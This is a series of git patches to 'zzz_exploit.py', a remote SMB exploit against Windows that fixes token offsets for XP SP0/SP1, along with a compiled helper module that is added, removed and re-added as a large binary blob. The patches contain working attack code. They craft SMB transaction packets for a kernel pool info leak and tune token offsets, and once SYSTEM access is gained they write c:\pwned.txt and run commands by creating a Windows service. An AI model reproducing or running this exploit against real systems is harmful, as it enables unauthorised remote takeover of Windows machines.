From 078d156a0d6a76590b9073fbb08439031dd1d6e4 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 18:32:20 -0700 Subject: [PATCH 1/9] fix offsets on XP SP0 and SP1 --- mysmb.pyc | Bin 0 -> 16693 bytes zzz_exploit.py | 120 ++++++++++++++++++++++++++----------------------- 2 files changed, 65 insertions(+), 55 deletions(-) create mode 100644 mysmb.pyc diff --git a/mysmb.pyc b/mysmb.pyc new file mode 100644 index 0000000000000000000000000000000000000000..c72fbe7fd06d08f3ed4276e128df596f68984605 GIT binary patch literal 16693 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 L0!J5ziv#})ezMr2 literal 0 HcmV?d00001 diff --git a/zzz_exploit.py b/zzz_exploit.py index 47b418d..46f8ead 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -87,7 +87,7 @@ struct SrvSecContext { } SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user. -It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. +It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL, PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns STATUS_SUCCESS when Token is NULL. @@ -154,6 +154,8 @@ WINXP_32_SESSION_INFO = { 'PCTXTHANDLE_TOKEN_OFFSET': 0x24, 'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c, 'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68, + 'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1': 0x40, + 'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1': 0x5c } WIN2K_32_SESSION_INFO = { @@ -285,7 +287,7 @@ def wait_for_request_processed(conn): def find_named_pipe(conn): pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] - + tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$') found_pipe = None for pipe in pipes: @@ -295,7 +297,7 @@ def find_named_pipe(conn): found_pipe = pipe except smb.SessionError as e: pass - + conn.disconnect_tree(tid) return found_pipe @@ -306,7 +308,7 @@ def reset_extra_mid(conn): global extra_last_mid, special_mid special_mid = (conn.next_mid() & 0xff00) - 0x100 extra_last_mid = special_mid - + def next_extra_mid(): global extra_last_mid extra_last_mid += 1 @@ -322,7 +324,7 @@ def leak_frag_size(conn, tid, fid): # this method can be used on Windows Vista/2008 and later # leak "Frag" pool size and determine target architecture info = {} - + # A "Frag" pool is placed after the large pool allocation if last page has some free space left. # A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version. # To make exploit more generic, exploit does info leak to find a "Frag" pool size. @@ -330,7 +332,7 @@ def leak_frag_size(conn, tid, fid): mid = conn.next_mid() req1 = conn.create_nt_trans_packet(5, param=pack(' 4: + print("Bad TOKEN offsets detected, performing workaround") + userAndGroupCount = unpack_from(' Date: Mon, 29 Jan 2018 18:34:24 -0700 Subject: [PATCH 2/9] remove .pyc file --- mysmb.pyc | Bin 16693 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 mysmb.pyc diff --git a/mysmb.pyc b/mysmb.pyc deleted file mode 100644 index c72fbe7fd06d08f3ed4276e128df596f68984605..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16693 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 L0!J5ziv#})ezMr2 From 434b7a3eb38785cc70c858ff87dd558d41661aa1 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 18:38:22 -0700 Subject: [PATCH 3/9] restore line starts --- zzz_exploit.py | 111 ++++++++++++++++++++++++------------------------- 1 file changed, 55 insertions(+), 56 deletions(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 46f8ead..e9f5996 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -87,7 +87,7 @@ struct SrvSecContext { } SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user. -It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. +It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL, PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns STATUS_SUCCESS when Token is NULL. @@ -287,7 +287,7 @@ def wait_for_request_processed(conn): def find_named_pipe(conn): pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] - + tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$') found_pipe = None for pipe in pipes: @@ -297,7 +297,7 @@ def find_named_pipe(conn): found_pipe = pipe except smb.SessionError as e: pass - + conn.disconnect_tree(tid) return found_pipe @@ -308,7 +308,7 @@ def reset_extra_mid(conn): global extra_last_mid, special_mid special_mid = (conn.next_mid() & 0xff00) - 0x100 extra_last_mid = special_mid - + def next_extra_mid(): global extra_last_mid extra_last_mid += 1 @@ -324,7 +324,7 @@ def leak_frag_size(conn, tid, fid): # this method can be used on Windows Vista/2008 and later # leak "Frag" pool size and determine target architecture info = {} - + # A "Frag" pool is placed after the large pool allocation if last page has some free space left. # A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version. # To make exploit more generic, exploit does info leak to find a "Frag" pool size. @@ -332,7 +332,7 @@ def leak_frag_size(conn, tid, fid): mid = conn.next_mid() req1 = conn.create_nt_trans_packet(5, param=pack(' 4: @@ -897,7 +896,7 @@ def exploit(target, pipe_name): # ================================ # do whatever we want as SYSTEM over this SMB connection - # ================================ + # ================================ try: smb_pwn(conn, info['arch']) except: @@ -920,13 +919,13 @@ def exploit(target, pipe_name): def smb_pwn(conn, arch): smbConn = conn.get_smbconnection() - + print('creating file c:\\pwned.txt on the target') tid2 = smbConn.connectTree('C$') fid2 = smbConn.createFile(tid2, '/pwned.txt') smbConn.closeFile(tid2, fid2) smbConn.disconnectTree(tid2) - + #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') # Note: there are many methods to get shell over SMB admin session @@ -943,7 +942,7 @@ def service_exec(conn, cmd): import random import string from impacket.dcerpc.v5 import transport, srvs, scmr - + service_name = ''.join([random.choice(string.letters) for i in range(4)]) # Setup up a DCE SMBTransport with the connection already in place @@ -955,7 +954,7 @@ def service_exec(conn, cmd): print("Opening SVCManager on %s....." % conn.get_remote_host()) resp = scmr.hROpenSCManagerW(rpcsvc) svcHandle = resp['lpScHandle'] - + # First we try to open the service in case it exists. If it does, we remove it. try: resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00') @@ -966,11 +965,11 @@ def service_exec(conn, cmd): # It exists, remove it scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle']) scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle']) - + print('Creating service %s.....' % service_name) resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00') serviceHandle = resp['lpServiceHandle'] - + if serviceHandle: # Start service try: @@ -982,7 +981,7 @@ def service_exec(conn, cmd): #scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP) except Exception as e: print(str(e)) - + print('Removing service %s.....' % service_name) scmr.hRDeleteService(rpcsvc, serviceHandle) scmr.hRCloseServiceHandle(rpcsvc, serviceHandle) From c915c66d79fb372f2f115c4744d049adbfcba1aa Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 18:54:30 -0700 Subject: [PATCH 4/9] more complex fix --- mysmb.pyc | Bin 0 -> 16693 bytes zzz_exploit.py | 14 +++++++++----- 2 files changed, 9 insertions(+), 5 deletions(-) create mode 100644 mysmb.pyc diff --git a/mysmb.pyc b/mysmb.pyc new file mode 100644 index 0000000000000000000000000000000000000000..c72fbe7fd06d08f3ed4276e128df596f68984605 GIT binary patch literal 16693 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 